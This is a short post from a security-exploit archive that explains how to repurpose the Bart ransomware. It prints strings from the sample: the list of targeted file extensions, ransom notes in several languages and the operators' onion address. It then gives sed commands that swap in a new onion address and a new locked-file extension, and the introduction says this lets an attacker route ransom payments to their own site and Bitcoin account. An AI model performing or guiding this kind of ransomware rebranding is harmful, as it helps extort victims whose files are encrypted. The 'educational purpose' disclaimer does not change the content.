exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Bart Ransomware (Win32/Filecoder.Bart) (Kidnapping) Resource Hacking

Bart Ransomware (Win32/Filecoder.Bart) (Kidnapping) Resource Hacking
Posted Nov 8, 2016
Authored by Todor Donev

This report explains the ability to change the code of Bart. An attacker can edit the code and seamlessly put their own dark website with a different Bitcoin account.

tags | exploit
SHA-256 | 235979bd4239144dac76322065de02f0e43ecad6b1af8f34cf9b75dd3c4fb090

Bart Ransomware (Win32/Filecoder.Bart) (Kidnapping) Resource Hacking

Change Mirror Download
#!/bin/sh
#
# Bart Ransomware (Win32/Filecoder.Bart) (Kidnapping) Resource Hacking
#
#
# Copyright 2016 (c) Todor Donev
# <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
#
## Thanks to Maya Hristova that support me.
#
#
# Description:
# Bart is a simple yet insidious ransomware
# program that locks files in encrypted,
# inaccessible archives until a ransom is paid.
# Bart, like most ransomware programs, searches
# for files that match a given description, then
# encrypts those files, leaving them unusable.
# This means all files of certain extensions (e.g.
# .pdf, .xls, etc.) will be inaccessible until
# the victim acquires the key. To obtain the key,
# the victim must pay a ransom.
#
# Some of the main features of Bart ransomware
# include the following:
# o The software enters computer through a ZIP
# attachment on an email.
# o The attachment contains a JavaScript file
# that, if executed, initiates the installation
# of Bart.
# o Unlike similar malware, Bart locks your
# files in encrypted, password-protected ZIP
# archives, rendering the files inaccessible.
# After the encryption, the naming format
# for the resulting ZIP archive is as follows:
# original_name.bart.zip.
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#


[todor@adamantium]$ strings bart.bin | grep -i -A 235 "Tahoma"

# Tahoma
# Control Panel\Desktop
# WallpaperStyle
# TileWallpaper
# AnOh/Cz9MMLiZMS9k/8huVvEbF6cg1TklaAQBLADaGiV
# winnt
# Application Data
# AppData
# PerfLogs
# Program Files (x86)
# Program Files
# ProgramData
# temp
# Recovery
# $Recycle.Bin
# System Volume Information
# Boot
# Windows
# .n64
# .m4u
# .m3u
# .mid
# .wma
# .flv
# .3g2
# .mkv
# .3gp
# .mp4
# .mov
# .avi
# .asf
# .mpeg
# .vob
# .mpg
# .wmv
# .fla
# .swf
# .wav
# .mp3
# .qcow2
# .vdi
# .vmdk
# .vmx
# .gpg
# .aes
# .ARC
# .PAQ
# .tar.bz2
# .tbk
# .bak
# .tar
# .tgz
# .rar
# .zip
# .djv
# .djvu
# .svg
# .bmp
# .png
# .gif
# .raw
# .cgm
# .jpeg
# .jpg
# .tif
# .tiff
# .NEF
# .psd
# .cmd
# .bat
# .class
# .jar
# .java
# .asp
# .brd
# .sch
# .dch
# .dip
# .vbs
# .asm
# .pas
# .cpp
# .php
# .ldf
# .mdf
# .ibd
# .MYI
# .MYD
# .frm
# .odb
# .dbf
# .mdb
# .SQLITEDB
# .SQLITE3
# .asc
# .lay6
# .lay
# .ms11(Security copy)
# .ms11
# .sldm
# .sldx
# .ppsm
# .ppsx
# .ppam
# .docb
# .sxm
# .otg
# .odg
# .uop
# .potx
# .potm
# .pptx
# .pptm
# .std
# .sxd
# .pot
# .pps
# .sti
# .sxi
# .otp
# .odp
# .wb2
# .123
# .wks
# .wk1
# .xltx
# .xltm
# .xlsx
# .xlsm
# .xlsb
# .slk
# .xlw
# .xlt
# .xlm
# .xlc
# .dif
# .stc
# .sxc
# .ots
# .ods
# .hwp
# .602
# .dotm
# .dotx
# .docm
# .docx
# .DOT
# .3dm
# .max
# .3ds
# .txt
# .CSV
# .uot
# .RTF
# .pdf
# .XLS
# .PPT
# .stw
# .sxw
# .ott
# .odt
# .DOC
# .pem
# .p12
# .csr
# .crt
# .key
# !!! IMPORTANT INFORMATION !!!
# All your files are encrypted.
# Decrypting of your files is only possible with the private key, which is on our secret server.
# To receive your private key follow one of the links:
# 1. http://%s.tor2web.org/?id=%s
# 2. http://%s.onion.to/?id=%s
# 3. http://%s.onion.cab/?id=%s
# 4. http://%s.onion.link/?id=%s
# If all addresses are not available, follow these steps:
# 1. Download and install Tor Browser: https://torproject.org/download/download-easy.html
# 2. After successfull installation, run the browser and wait for initialization.
# 3. Type in the address bar:
# %s.onion/?id=%s
# 4. Follow the instructions on the site.
# !!! INFORMAZIONI IMPORTANTI !!!
# Tutti i file sono criptati.
# Decifrare dei file ? possibile solo con la chiave privata, che ? sul nostro server segreto.
# Per ricevere la chiave privata seguire uno dei link :
# 1. http://%s.tor2web.org/?id=%s
# 2. http://%s.onion.to/?id=%s
# 3. http://%s.onion.cab/?id=%s
# 4. http://%s.onion.link/?id=%s
# Se tutti gli indirizzi non sono disponibili, attenersi alla seguente procedura:
# 1. Scaricare e installare Tor Browser: https://torproject.org/download/download-easy.html
# 2. Dopo l'installazione di successo, eseguire il browser e attendere l'inizializzazione.
# 3. Digitare nella barra degli indirizzi:
# %s.onion/?id=%s
# 4. Seguire le istruzioni sul sito
# !!! INFORMATIONS IMPORTANTES !!!
# Tous vos fichiers sont crypt?s.
# D?chiffrer de vos fichiers est seulement possible avec la cl? priv?e, qui est sur notre serveur secret.
# Pour recevoir votre cl? priv?e suivre l'un des liens:
# 1. http://%s.tor2web.org/?id=%s
# 2. http://%s.onion.to/?id=%s
# 3. http://%s.onion.cab/?id=%s
# 4. http://%s.onion.link/?id=%s
# Si toutes les adresses ne sont pas disponibles, proc?dez comme suit:
# 1. T?l?chargez et installez Tor Browser: https://torproject.org/download/download-easy.html
# 2. Une fois l'installation r?ussie, ex?cutez le navigateur et attendez que l'initialisation.
# 3. Tapez dans la barre d'adresse:
# %s.onion/?id=%s
# 4. Suivez les instructions sur le site.
# !!! WICHTIGE INFORMATIONEN !!!
# Alle Ihre Dateien werden verschl?sselt.
# Entschl?sseln der Dateien ist nur mit dem privaten Schl?ssel, die auf unserer geheimen Server ist.
# So empfangen Sie Ihren privaten Schl?ssel auf einen der Links folgen:
# 1. http://%s.tor2web.org/?id=%s
# 2. http://%s.onion.to/?id=%s
# 3. http://%s.onion.cab/?id=%s
# 4. http://%s.onion.link/?id=%s
# Wenn alle Adressen nicht verf?gbar sind, gehen Sie folgenderma?en vor:
# 1. Downloaden und installieren Browser Tor: https://torproject.org/download/download-easy.html
# 2. Nach erfolgreicher Installation der Browser ausgef?hrt wird und f?r die Initialisierung warten.
# 3. Geben Sie in der Adressleiste:
# %s.onion/?id=%s
# 4. Folgen Sie den Anweisungen auf der Website.
# !!! Your personal identification ID: %s !!!
# !!! La vostra identificazione personale ID: %s !!!
# !!! Votre identification personnelle ID: %s !!!
# !!! Ihre pers?nliche Identifikations ID: %s !!!
# !!! Su identificaci?n personal ID : %s !!!
# khh5cmzh5q7yp7th # DARKWEB ADDRESS: http://khh5cmzh5q7yp7th.onion/
# .bart # LOCKED FILE FORMAT: .bart.zip
# .recover.
# \\.\
# recover.txt
# \recover.bmp
# \recover.txt
# notepad.exe "

[todor@adamantium]$ sed -i 's/khh5cmzh5q7yp7th/1234567890123456/g' bart.bin
[todor@adamantium]$ strings bart.bin | grep -i -A 5 "personal"

# !!! Your personal identification ID: %s !!!
# !!! La vostra identificazione personale ID: %s !!!
# !!! Votre identification personnelle ID: %s !!!
# !!! Ihre pers?nliche Identifikations ID: %s !!!
# !!! Su identificaci?n personal ID : %s !!!
# 1234567890123456 # DARKWEB ADDRESS IS CHANGED TO: http://1234567890123456.onion/ (Invalid TOR address)
# .bart
# .recover.
# \\.\
# recover.txt

[todor@adamantium]$ sed -i 's/.bart/.ethk/g' bart.bin

[todor@adamantium]$ strings bart.bin | grep -i -A 5 "personal"

# !!! Your personal identification ID: %s !!!
# !!! La vostra identificazione personale ID: %s !!!
# !!! Votre identification personnelle ID: %s !!!
# !!! Ihre pers?nliche Identifikations ID: %s !!!
# !!! Su identificaci?n personal ID : %s !!!
# 1234567890123456 # DARKWEB ADDRESS IS CHANGED TO: http://1234567890123456.onion/ (Invalid TOR address)
# .ethk # LOCKED FILE FORMAT IS CHANGED TO: .ethk.zip
# .recover.
# \\.\
# recover.txt
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close